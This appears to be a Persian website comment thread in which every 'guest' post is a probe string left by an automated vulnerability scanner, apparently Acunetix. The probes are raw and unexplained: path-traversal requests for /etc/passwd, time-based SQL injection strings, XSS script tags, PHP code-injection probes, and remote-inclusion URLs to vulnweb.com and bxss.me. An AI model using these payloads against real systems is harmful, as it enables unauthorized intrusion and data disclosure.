مهمان 11 مهر 1396 - 14:50

/etc/passwd

مهمان 11 مهر 1396 - 14:50

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

مهمان 11 مهر 1396 - 14:50

/../..//../..//../..//../..//../..//etc/passwd.jpg

مهمان 11 مهر 1396 - 14:50

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 11 مهر 1396 - 14:50

../../../../../../../../../../etc/passwd.jpg

مهمان 11 مهر 1396 - 14:50

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 11 مهر 1396 - 14:50

../../../../../../../../../../../../../../../proc/version

مهمان 11 مهر 1396 - 14:50

../../../../../../../../../../etc/passwd

مهمان 11 مهر 1396 - 14:50

892'

مهمان 11 مهر 1396 - 14:50

31btAMef'));select pg_sleep(6); --

مهمان 11 مهر 1396 - 14:50

WkvRFrT3');select pg_sleep(6); --

مهمان 11 مهر 1396 - 14:50

lNwl7bCX';select pg_sleep(18); --

مهمان 11 مهر 1396 - 14:50

-1));select pg_sleep(18); --

مهمان 11 مهر 1396 - 14:50

-1);select pg_sleep(18); --

مهمان 11 مهر 1396 - 14:50

-1;select pg_sleep(12); --

مهمان 11 مهر 1396 - 14:50

FRum6Njd'; waitfor delay '0:0:12' --

مهمان 11 مهر 1396 - 14:50

1 waitfor delay '0:0:12' --

مهمان 11 مهر 1396 - 14:49

-1); waitfor delay '0:0:6' --

مهمان 11 مهر 1396 - 14:49

-1; waitfor delay '0:0:6' --

مهمان 11 مهر 1396 - 14:49

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

مهمان 11 مهر 1396 - 14:49

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

مهمان 11 مهر 1396 - 14:49

-1" OR 2+658-658-1=0+0+0+1 --

مهمان 11 مهر 1396 - 14:49

-1' OR 2+800-800-1=0+0+0+1 or 'qvXM76OO'='

مهمان 11 مهر 1396 - 14:49

-1' OR 2+61-61-1=0+0+0+1 --

مهمان 11 مهر 1396 - 14:49

19173840

مهمان 11 مهر 1396 - 14:49

-1 OR 2+466-466-1=0+0+0+1

مهمان 11 مهر 1396 - 14:49

-1 OR 2+400-400-1=0+0+0+1 --

مهمان 11 مهر 1396 - 14:49

'"()&%<acx><script>bJSu(9245)</script></acx>

مهمان 11 مهر 1396 - 14:49

yh9y7ls8

مهمان 11 مهر 1396 - 14:49

1

مهمان 11 مهر 1396 - 14:49

1

مهمان 11 مهر 1396 - 14:49

1'"()&%<acx><script>bJSu(9584)</script></acx>

مهمان 11 مهر 1396 - 14:49

�''�""

مهمان 11 مهر 1396 - 14:49

�'�"

مهمان 11 مهر 1396 - 14:49

JyI=

مهمان 11 مهر 1396 - 14:49

@@ZZSc3

مهمان 11 مهر 1396 - 14:49

1����%2527%2522

مهمان 11 مهر 1396 - 14:49

\

مهمان 11 مهر 1396 - 14:49

1'"

مهمان 11 مهر 1396 - 14:49

مهمان 11 مهر 1396 - 14:49

'"

مهمان 11 مهر 1396 - 14:49

/www.vulnweb.com

مهمان 11 مهر 1396 - 14:49

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

مهمان 11 مهر 1396 - 14:49

${@print(md5(acunetix_wvs_security_test))}\

مهمان 11 مهر 1396 - 14:49

${@print(md5(acunetix_wvs_security_test))}

مهمان 11 مهر 1396 - 14:49

";print(md5(acunetix_wvs_security_test));$a="

مهمان 11 مهر 1396 - 14:49

';print(md5(acunetix_wvs_security_test));$a='

مهمان 11 مهر 1396 - 14:49

;print(md5(acunetix_wvs_security_test));

مهمان 11 مهر 1396 - 14:49

post-comment-topic/.

مهمان 11 مهر 1396 - 14:49

post-comment-topic

مهمان 11 مهر 1396 - 14:49

http://hitKBx0wxglvZ.bxss.me/

مهمان 11 مهر 1396 - 14:49

post-comment-topic

مهمان 11 مهر 1396 - 14:49

testasp.vulnweb.com

مهمان 11 مهر 1396 - 14:48

http://testasp.vulnweb.com/t/fit.txt?.jpg

مهمان 11 مهر 1396 - 14:48

Http://testasp.vulnweb.com/t/fit.txt

مهمان 11 مهر 1396 - 14:48

1some_inexistent_file_with_long_name.jpg

مهمان 11 مهر 1396 - 14:48

^(#$!@#$)(()))******

مهمان 11 مهر 1396 - 14:48

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg